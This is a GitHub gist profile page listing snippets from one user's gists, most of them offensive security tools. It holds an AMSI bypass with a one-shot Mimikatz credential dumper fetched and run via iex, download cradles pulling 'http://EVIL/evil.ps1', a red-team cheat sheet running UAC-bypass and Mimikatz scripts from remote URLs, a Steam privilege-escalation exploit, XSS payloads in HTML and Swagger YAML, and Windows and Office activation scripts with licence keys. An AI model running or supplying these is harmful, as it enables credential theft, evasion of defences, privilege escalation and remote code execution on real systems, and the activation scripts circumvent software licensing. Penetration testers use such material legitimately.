Skip to content

Instantly share code, notes, and snippets.

View roflsandwich's full-sized avatar

roflsandwich

18 followers · 4 following
View GitHub Profile
@roflsandwich
roflsandwich / rcon_client.ps1
Created March 6, 2024 22:13
RCON Client in Powershell, works in games such as Palworld and Minecraft
#Variables
$serverAddress = "127.0.0.1"
$serverPort = 25575
$Password = ""
$ErrorActionPreference = [System.Management.Automation.ActionPreference]::Stop
class RconPacket {
# https://developer.valvesoftware.com/wiki/Source_RCON_Protocol
hidden [byte[]] $pktSize
[byte[]] $PktId
@roflsandwich
roflsandwich / alert.html
Created March 29, 2023 14:28
alert domain
<html>
<body>
<script>alert(document.domain)</script>
</body>
</html>
@roflsandwich
roflsandwich / activate.cmd
Last active March 9, 2023 11:19 — forked from thdtt/activate.cmd
Office 365 Activator
@echo off
echo #Supported products: Office 365 ProPlus (x86-x64)
echo.
echo.
(if exist "%ProgramFiles%\Microsoft Office\Office16\ospp.vbs" cd /d "%ProgramFiles%\Microsoft Office\Office16")
(if exist "%ProgramFiles(x86)%\Microsoft Office\Office16\ospp.vbs" cd /d "%ProgramFiles(x86)%\Microsoft Office\Office16")
(for /f %%x in ('dir /b ..\root\Licenses16\proplusvl_kms*.xrm-ms') do cscript ospp.vbs /inslic:"..\root\Licenses16\%%x" >nul)
(for /f %%x in ('dir /b ..\root\Licenses16\proplusvl_mak*.xrm-ms') do cscript ospp.vbs /inslic:"..\root\Licenses16\%%x" >nul)
echo.
echo ============================================================================
@roflsandwich
roflsandwich / swaggertest.yaml
Last active April 10, 2023 13:34
swagger: '2.0'
info:
title: Classic API Resource Documentation
description: |
<form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert('XSS\n'+document.domain) src=1>"></form>
version: production
basePath: /JSSResource/
produces:
- application/xml
@roflsandwich
roflsandwich / Invoke-OneShot-Mimikatz.ps1
Last active February 10, 2023 12:46 — forked from pich4ya/Invoke-OneShot-Mimikatz.ps1
Invoke-OneShot-Mimikatz.ps1 - One Shot for Mimikatz PowerShell Dump All Creds with AMSI Bypass 2022 Edition
#Obfuscate the AMSI bypass
#Powershell ISE > Start-Steroids
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
#If Obfuscation is not working with steroids, split all string!
[Ref].Assembly.GetType('System.Management.Automation.Am'+'siU'+'tils').GetField('am'+'siIn'+'itFai'+'led','NonPublic,Static').SetValue($null,$true)
#New Obfuscated method 2023
$a='si';$b='Am';$Ref=[Ref].Assembly.GetType(('System.Management.Automation.{0}{1}Utils'-f $b,$a)); $z=$Ref.GetField(('am{0}InitFailed'-f$a),'NonPublic,Static');$z.SetValue($null,$true)
# nishang - 2.2.0 (Jul 24, 2021)
# Change this to "attacker-local-ip" for internal sources
wget('https://gist.githubusercontent.com/pich4ya/144d32262861b573279d15e653c4e08d/raw/6f019c4e2f1f62ffc0754d01dff745d3cec62057/Invoke-SoHighSoHigh.ps1') -UseBasicParsing|iex
@roflsandwich
roflsandwich / windows10activation
Created November 12, 2020 22:57
Activate Windows 10 without Any Activator
1. Open CMD as Administrator
2. Paste the following commands into the Cmd: One by one, follow the order.
cscript slmgr.vbs /ipk "SERIAL NUMBER HERE"
Replace SERIAL NUMBER HER with any of these, according your Windows 10 installation type.
Home/Core TX9XD-98N7V-6WMQ6-BX7FG-H8Q99
Home/Core (Country Specific) PVMJN-6DFY6-9CCP6-7BKTT-D3WVR
Home/Core (Single Language) 7HNRX-D7KGG-3K4RQ-4WPJ4-YTDFH
@roflsandwich
roflsandwich / SteamEoP.ps1
Last active August 7, 2019 22:25 — forked from enigma0x3/SteamEoP.ps1
$cmd = Read-Host -Prompt 'Enter the command you wish to execute as system'
Write-Host "[*] Installing NTObjectManager..."
install-module NTObjectManager -Scope CurrentUser -Force
import-module NTObjectManager
Write-Host "[*] Creating Registry Symbolic Link from HKLM:\SOFTWARE\WOW6432Node\Valve\Steam\Apps\PrivEsc to HKLM:\SYSTEM\CurrentControlSet\Services\Steam Client Service"
[NtApiDotNet.NtKey]::CreateSymbolicLink("\Registry\Machine\SOFTWARE\WOW6432Node\Valve\Steam\Apps\PrivEsc",$null, "\REGISTRY\Machine\SYSTEM\CurrentControlSet\Services\Steam Client Service")
Write-Host "[*] Registry Symbolic link created, restarting the Steam Client Service"
Get-Service "Steam Client Service" | Restart-Service
Write-Host "[*] Sleeping 5 seconds"
Start-Sleep 5
@roflsandwich
roflsandwich / DownloadCradles.ps1
Created August 2, 2019 13:13 — forked from HarmJ0y/DownloadCradles.ps1
Download Cradles
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')
# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
# Msxml2.XMLHTTP COM object
@roflsandwich
roflsandwich / RedTeam_CheatSheet.ps1
Created July 30, 2019 23:00 — forked from jivoi/RedTeam_CheatSheet.ps1
# Description:
# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"
# Invoke-Mimikatz: Dump credentials from memory
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
# Import Mimikatz Module to run further commands